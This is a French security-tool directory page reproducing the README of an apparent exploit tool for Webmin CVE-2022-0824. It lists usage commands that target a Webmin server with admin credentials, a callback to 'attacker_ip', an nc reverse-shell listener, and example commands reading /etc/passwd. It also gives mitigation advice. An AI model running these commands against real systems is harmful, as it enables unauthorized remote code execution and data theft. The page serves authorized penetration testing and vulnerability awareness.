Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Webmin-CVE-2022-0824-Enhanced-Exploit — Exploit Python pour Webmin CVE-2022-0824 avec prise en charge à double mode : exécution directe de commandes et shell inversé. Comprend plusieurs types de payloads, une gestion intelligente des fichiers et une journalisation de débogage détaillée pour les tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/nudttan91/webmin-cve-2022-0824-enhanced-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à DistanceGénération de Shellcode
GitHubnudttan91/webmin-cve-2022-0824-enhanced-exploit

Webmin-CVE-2022-0824-Enhanced-Exploit

Voir le dépôt
8il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Exploit Python pour Webmin CVE-2022-0824 avec prise en charge à double mode : exécution directe de commandes et shell inversé. Comprend plusieurs types de payloads, une gestion intelligente des fichiers et une journalisation de débogage détaillée pour les tests de sécurité autorisés.

Partager

Webmin-CVE-2022-0824-Enhanced-Exploit

[!IMPORTANT]

Outil d'exploitation amélioré pour Webmin CVE-2022-0824 - prend en charge les modes exécution de commandes et shell inversé

Python Version License CVE

[!IMPORTANT]

Un outil d'exploitation amélioré pour la vulnérabilité Webmin CVE-2022-0824, prenant en charge l'exécution directe de commandes et le shell inversé.

🚀 Fonctionnalités

  • ✅ Support double mode : mode exécution de commandes + mode shell inversé
  • ✅ Plusieurs payloads : trois payloads différents (Perl, Bash, Python)
  • ✅ Gestion intelligente des fichiers : génération automatique de noms de fichiers uniques pour éviter les conflits
  • ✅ Téléversement avec écrasement forcé : gestion automatique de l'écrasement des fichiers existants
  • ✅ Méthodes de téléversement multiples : téléchargement HTTP, téléversement direct, création par exécution de commande
  • ✅ Informations de débogage détaillées : journal complet du processus d'exécution
  • ✅ Interface conviviale : sortie colorée et indicateurs d'état clairs
  • 📋 Informations sur la vulnérabilité

    • Identifiant CVE : CVE-2022-0824
    • Versions affectées : Webmin < 1.990
    • Type de vulnérabilité : exécution de code à distance via un téléversement de fichier arbitraire
    • Score CVSS : 9.8 (Critique)

    🛠️ Prérequis d'installation

    root@kitploit:~
    # Python 3.6+
    pip3 install requests urllib3
    

    📖 Utilisation

    Mode d'exécution de commandes (recommandé)

    root@kitploit:~
    # Exécution de commande de base
    python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"
    
    # Afficher les informations système
    python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"
    
    # Lister les fichiers
    python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"
    
    # Afficher les fichiers sensibles
    python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"
    
    # Informations réseau
    python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"
    

    Mode shell inversé

    root@kitploit:~
    # 1. Démarrer un listener
    nc -nlvp 9999
    
    # 2. Exécuter l'exploit
    python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999
    

    📝 Description des paramètres

    ParamètreDescriptionRequisExemple
    -t, --targetURL Webmin cible✅http://192.168.1.100:10000/
    -c, --credentialIdentifiants de connexion✅admin:password
    -LS, --py3http_serverAdresse du serveur HTTP✅192.168.1.50:8080
    --shellCommande à exécuter❌"ls -la"
    -L, --callback_ipIP de rappel du shell inversé❌*192.168.1.50
    -P, --callback_portPort de rappel du shell inversé❌*9999

    *Remarque : requis en mode shell inversé

    🎯 Exemples d'utilisation

    Exemple 1 : collecte d'informations système

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"
    

    Exemple 2 : exploration du système de fichiers

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"
    

    Exemple 3 : consultation de la configuration réseau

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"
    

    🔧 Fonctionnement

    1. Authentification : connexion à l'interface d'administration Webmin avec les identifiants fournis
    2. Génération du payload : génération du script CGI correspondant selon le mode
    3. Téléversement du fichier : téléversement du payload via la fonction de téléchargement HTTP du gestionnaire de fichiers
    4. Définition des permissions : définition des droits d'exécution du fichier téléversé
    5. Exécution de commandes : accès au script CGI téléversé pour exécuter des commandes ou établir une connexion inverse

    🛡️ Recommandations de protection

    • Mettre à jour Webmin vers la dernière version (>= 1.990)
    • Restreindre l'accès réseau à l'interface d'administration Webmin
    • Utiliser des mots de passe forts et une authentification à deux facteurs
    • Auditer régulièrement les journaux système
    • Déployer un pare-feu applicatif Web (WAF)

    ⚠️ Avertissement

    Cet outil est destiné uniquement à des tests de sécurité autorisés et à des fins éducatives.

    • 🚫 Interdit sur les systèmes non autorisés
    • 🚫 Interdit pour les attaques malveillantes
    • 🚫 L'utilisateur assume la responsabilité légale correspondante
    • ✅ À utiliser uniquement dans un environnement explicitement autorisé
    • ✅ Pour la recherche en sécurité et la validation de vulnérabilités

    📚 Détails techniques

    Types de payload

    • Perl CGI : payload principal, meilleure compatibilité
    • Bash CGI : payload de secours, adapté aux systèmes Linux
    • Python CGI : payload de secours, le plus riche en fonctionnalités

    Méthodes de téléversement

    1. Téléchargement HTTP : via la fonction de téléchargement distant du gestionnaire de fichiers Webmin
    2. Téléversement direct : via l'interface de téléversement de fichiers
    3. Création par commande : création du fichier via des commandes système

    Stratégie de nommage des fichiers

    • Hash MD5 basé sur le contenu de la commande
    • Suffixe d'horodatage
    • Garantir un nom de fichier différent à chaque exécution

    🔄 Journal des mises à jour

    v5.0 (2025-08-05)

    • ✨ Ajout du mode d'exécution de commandes
    • 🐛 Correction du problème d'écrasement des fichiers
    • 🔧 Amélioration de la stratégie de nommage des fichiers
    • 📈 Renforcement de la gestion des erreurs

    v4.0 (basé sur la version originale)

    • 🎯 Basé sur le code original de faisalfs10x
    • 🔧 Amélioration de la compatibilité CGI
    • 📝 Ajout de journaux détaillés

    🤝 Contribution

    Les issues et pull requests sont les bienvenues !

    1. Fork ce projet
    2. Créer une branche de fonctionnalité (git checkout -b feature/AmazingFeature)
    3. Commiter les modifications (git commit -m 'Add some AmazingFeature')
    4. Pousser vers la branche (git push origin feature/AmazingFeature)
    5. Ouvrir une pull request

    📄 Licence

    Ce projet est sous licence MIT - consultez le fichier LICENSE pour plus de détails

    🙏 Remerciements

    • Auteur du code original : @faisalfs10x
    • Adresse du projet original : Webmin-CVE-2022-0824-revshell
    • Découvreur du CVE : chercheurs en sécurité concernés

    📞 Contact

    Pour toute question ou suggestion, veuillez nous contacter via :

    • 📧 Soumettre une issue GitHub
    • 🐛 Signaler les problèmes de sécurité par message privé

    ⭐ Si ce projet vous est utile, soutenez-le avec une étoile !

    🔗 Liens connexes

    • Détails CVE-2022-0824
    • Site officiel de Webmin
    • Projet original

    requirements.txt

    root@kitploit:~
    requests>=2.25.1
    urllib3>=1.26.0
    
    Télécharger l’outil